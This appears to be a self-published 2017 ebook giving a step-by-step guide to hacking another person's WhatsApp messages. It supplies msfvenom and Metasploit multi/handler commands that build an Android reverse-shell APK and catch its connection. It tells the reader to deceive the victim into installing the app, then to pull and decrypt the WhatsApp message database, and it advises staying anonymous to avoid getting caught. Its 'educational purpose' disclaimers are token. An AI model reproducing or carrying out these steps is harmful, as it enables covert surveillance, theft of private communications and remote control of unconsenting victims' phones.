You are on page 1of 36

How to Hack Whats App Account

BY-

HARSH TOMAR
Copyright © 2017 Harsh Tomar

All Rights Reserved


"I DO NOT PROM OTE HACKING IN ANY WAY"
Index

Introduction 1

Warning 3

Prequiste 5

How to Hack 7
-send payload

-fetch data

-download messages

-decypt the encrpted messages

Conclusion 19

About The Author 22


1

INTRODUCTION
2

If human Brain can create apps like Whats app and Facebook,then probably there is no doubt if Human Brain can Hack them too.(I have
already made a book on Facebook hacking you can check that out on amazon by typing my name in search engine). There are many
ways on internet that Whats app can be hacked by this method and that method mostly of them tell you about whats web,spy features or
changing the mac address of victim;s mobile phone and spoofing the mac address as same as the victim's mobile phone but those hacking
tricks need an physical access to victim's mobile phone or too complicated if not need an physical access and what i am going to tell in
this book is without having the physical access to victims mobile phone you can hack whats app.So Let's get started!!!
3

WARNING
4

You Should Be Anonymous!

While Hacking Facebook if you don’t want to get Caught You Should be Anonymous and how to be anonymous????????

I Have Written Another Book On WiFi Hacking In which You can Find how to be Anonymous While Hacking Someone’s Whats-App
Account You can find that book by Just typing “Harsh Tomar” in Amazon Search Engine
5

PREQUSITE
6

You need an installed Kali Linux on you computer machine.I have already written a book on "WiFi Hacking" in which i have mentioned
all step by step Guide (with photos) that how you can install Kali Linux on your PC which includes direct install,running live and running
in VmWare workstation or virtual box(which is recommended if you are newbie in hacking field)So, I am not Mentioning that again it will
only increase the length of book so i will move straight forward to steps that how to hack Someone's whats app account,and of course
You need zero knowledge of Kali Linux because i will be explaining step-by-step as we move forward.AND THE MOST IMPORTANT
YOU AND VICTIM MUST BE ON SAME WIFI NETWORK.Oh- i forget to tell that you need an sharp brain too(LOL)!!
7

HOW TO HACK
8

Disclaimer: This is only for


educational purpose take prior permission before accessing anyone's databheading
9

STEPS

1. Fire up Kali Linux,open terminal and write the following code

msfvenom -p android/meterpreter/reverse_tcp LHOST=xxx.xx.xxx LPORT=4444 R > andro.apk

"Replace xxx.xx.xxx with you ip address(you can find you ipadrees by typing myip address in google search)"
10

2.Now our payload is created,send this payload to the victim phone either
through Dropbox or email or any of the way you are familiar with and ask him to open it!

This is a little tricky part if your victim has trust on you you can get his phone physical touch and do all this stuff but if not then you can fake him by telling that this
is great app and you must install it all you have to do is fake it!!!
11

3. Now write,and wait for it to open

msfconsole

4.Now write
use multi/handler

5.Now write

set payload android/meterpreter/reverse_tcp

set LHOST xxx.xx.xxx

set LPORT 4444

exploit
12

6.Now victim will run the application by just clicking and it will run all the time in background
until phone restart's and you can see session opened once application is clicked by victim

7. Now type

shell

ls

8.Now you can see all the folders in your root folder of android mobile
13

9.Now type

cd sdcard

ls
10.Now locate to WhatsApp Folder and type

cd WhatsApp

ls

11. Now you are in whatsapp folder of victim mobile phone Now type

cd Databases

ls
14

12.Now you can see backup of messages


" BOOM" you are On now you can download them by typing this -
download FILENAM E..db.crypt12

13.You can download all files by typing the above command and then close the session and turn
everything off once you got the databse.db.crypt file

14. Now move on to your windows OS and download whatsapp viewer from github or
from the link down below

https://github.com/andreas-mausch/whatsapp-

viewer/releases/tag/v1.9

15.Once you have downloaded Whatsapp viewer and you have encrypted messages as well we can
read all the messages by decrypting them
15
16.Open whats app viewer navigate to
file and choose your decryption
method
17. Now navigate to the encrypted file and select that file to decrypt it!!
16

18.once it is decrypted it will create a message.decryption file in you folder where the
encypted messages are
19.Now click on file again and choose open and choose the message.decryption file
17

20.Now file will be opened and you can see messages


18

IF this encryption to decryption method not worked for you or you can'y
understand it you can watch videos on youtube searching for "how to decrypt whatsapp messages"
19

CONCLUSION
20

ALTHOUGH THERE ARE MANY


WAYS IN WHICH HACKING
PREVAILS IN THE WORLD BUT THE MOST SAFEST AND MOST WORKED METHOD IS
BY KALI LINUX OS WHICH KEEPS US ANONYMOUS IN MOST OF CASES AND GIVES
US TOOL TO BE ANONYMOUS I HAVE MENTIONED HOW TO BE ANONYMOUS IN "WIFI
HACKING" BOOK AND CHECK OUT THE OTHER BOOKS OF MINE BY JUST TYPING
MY NAME IN AMAZON SEARCH ENGINE

please do not hack anyone without his/her permission all i explained in this book is for educational purpose

SO DON'T BE A FOOL AND ACT SM ARTLY

POST A POSITIVE REVIEW IF YOU FIND THE BOOK HELPFUL


21
22

ABOUT THE AUTHOR

HARSH TOMAR, AGED 17, WHO HAD


JUST COMPLETED HIS +2 AND DECIDED TO BECOME A NON-FICTION AUTHOR HE SELF
PUBLISHED HIS NONFICTION BOOKS. HE IS TOO MUCH INTRESTED IN COMPUTERS
SINCE HE WAS 10 YEAR OLD AND GRADUALLY TURNED HIS INTREST INTO PASSION. HE
WANTS TO HELP PEOPLE AND LET THEM KNOW WAYS OF HACKING AND SECURITY SO
THA THEY CAN PROTECT THEMSELVES AGAINST HACKING AND LEARN HACKING
TOO!!!
23

IF ANY PROBLEM CONTACT

htomar22222@gmail.com

You might also like